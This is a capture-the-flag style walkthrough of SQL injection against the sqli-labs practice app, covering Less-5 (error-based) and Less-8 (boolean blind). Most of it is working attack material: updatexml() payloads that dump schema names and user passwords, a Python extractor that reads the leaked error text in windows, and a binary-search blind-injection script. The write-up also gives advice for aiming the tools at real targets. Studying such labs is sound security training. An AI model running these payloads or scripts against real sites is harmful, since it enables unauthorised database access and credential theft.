sqli-labs Less-5 (error-based injection)
?id=1 displays "You are in..........."
?id=2-1 also displays "You are in..........." (the page never shows row data, so this numeric test tells us nothing here)
?id=1' displays an error quoting '1'' LIMIT 0,1, so the parameter is a string closed with a single quote. ?id=1' order by 3--+ // the page displays normally; order by 4 throws an error, so there are 3 columns. Because the MySQL error text is echoed to the page, we can use error-based injection.
First we dump the database name
http://127.0.0.1/sqli-labs-master/Less-5/?id=' and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+
Got the database name: security. Next we dump the table names
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
Got the table names. Next we dump the columns
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1)--+
Then we dump the data
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),1)--+
The data comes back incomplete, because the XPath error text that updatexml() leaks is capped at 32 characters, so we have to pull the data out in pieces.
Use substring() to cut the result into windows
?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1)--+
After that we keep moving the start position, and this way we get all the data; the remaining steps are not shown. Note that one of the 32 visible characters is the 0x7e marker, so each window really exposes 31 characters of data: stepping the start position by 31 (1, 32, 63, ...) avoids both gaps and overlap, and the 64 above could just as well be 31.
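The windowing procedure above, automated, as an added example that is not part of the original write-up: it builds the updatexml() payload for a given start position, parses the leaked text out of the MySQL XPath error, and advances 31 characters at a time until a short window marks the end of the result. The target URL, the use of a single-quote closure, and the offline `fake_send` stand-in with its constructed user rows are assumptions made for this example; `send_http` is the real transport.

```python
import re
from urllib.parse import urlencode
from urllib.request import urlopen

# Assumed target (sqli-labs Less-5). MySQL shows at most 32 characters of the XPath error text,
# and one of them is our 0x7e ('~') marker, so each window can carry 31 characters of data.
URL = "http://127.0.0.1/sqli-labs-master/Less-5/"
WINDOW = 31


def build_payload(expr, pos):
    """id=-1' and updatexml(1, concat('~', substr((<expr>), pos, 31)), 1)--  in the single-quote string context."""
    return "-1' and updatexml(1,concat(0x7e,substr((%s),%d,%d)),1)-- " % (expr, pos, WINDOW)


def parse_leak(html):
    """Return the text after the '~' marker in the MySQL error, or None if the page shows no XPath error."""
    m = re.search(r"XPATH syntax error: '~([^']*)'", html)
    return m.group(1) if m else None


def extract(send, expr):
    """Dump expr in 31-character windows starting at 1, 32, 63, ... until a short window signals the end."""
    out = ""
    pos = 1
    while True:
        chunk = parse_leak(send(build_payload(expr, pos)))
        if chunk is None:
            raise RuntimeError("no XPath error in the response: wrong closure, or errors are not echoed")
        out += chunk
        if len(chunk) < WINDOW:
            return out
        pos += WINDOW


def send_http(payload):
    """Real transport for a live Less-5 (not used by the offline demo below)."""
    with urlopen(URL + "?" + urlencode({"id": payload})) as resp:
        return resp.read().decode("utf-8", "replace")


# --- offline stand-in for the Less-5 page, constructed for this example ---
FAKE_ROWS = "Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy"  # 58 chars: two windows


def fake_send(payload):
    """Emulate the server: apply substr() to the constructed rows and truncate the error to 32 chars."""
    m = re.search(r"substr\(\((.*)\),(\d+),(\d+)\)", payload)
    pos, length = int(m.group(2)), int(m.group(3))
    leaked = "~" + FAKE_ROWS[pos - 1:pos - 1 + length]
    return "XPATH syntax error: '%s'" % leaked[:32]


if __name__ == "__main__":
    print(extract(fake_send, "select group_concat(username,0x7e,password) from users"))
    # Against a live Less-5:
    # print(extract(send_http, "select group_concat(username,0x7e,password) from users"))
```

Two things to keep in mind when pointing this at a real target: group_concat() is itself capped by group_concat_max_len (1024 characters by default), so very large tables need to be read row by row with LIMIT, and a leaked value containing a single quote will confuse the regex in parse_leak().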
sqli-labs Less-8 (boolean blind injection): the error output is commented out, and a union query only ever shows "You are in...........".
So what we have is a page that looks different for a true and a false condition:
without the quote, the condition is true
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
with the quote added, it is false
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
So we can use boolean blind injection.
Database name: the first character of security is "s", whose ASCII code is 115, so we can test it one character at a time
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substring((select database()),1,1))=115--+
Using binary search over the ASCII codes makes this much faster
Based on that behaviour, we write a Python script to automate the injection
import time
import requests

url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php"

def inject_database(url):
    name = ''
    for i in range(1, 50):          # one character per iteration; raise 50 for longer results
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:           # binary search the ASCII code of character i
            payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            # start_time = time.time()
            r = requests.get(url, params=res)
            # end_time = time.time()
            if "You are in..........." in r.text:   # true page: the code is greater than mid
                low = mid + 1
            else:                                   # false page: the code is at most mid
                high = mid
            mid = (low + high) // 2
        if mid == 32:               # past the end substr() returns '' and ascii('') is 0, so the search bottoms out at 32
            break
        name = name + chr(mid)
        print(name)

inject_database(url)
That dumps the database name. To dump the table names, change the payload to
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)
To dump the column names:
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)
To dump the data:
payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)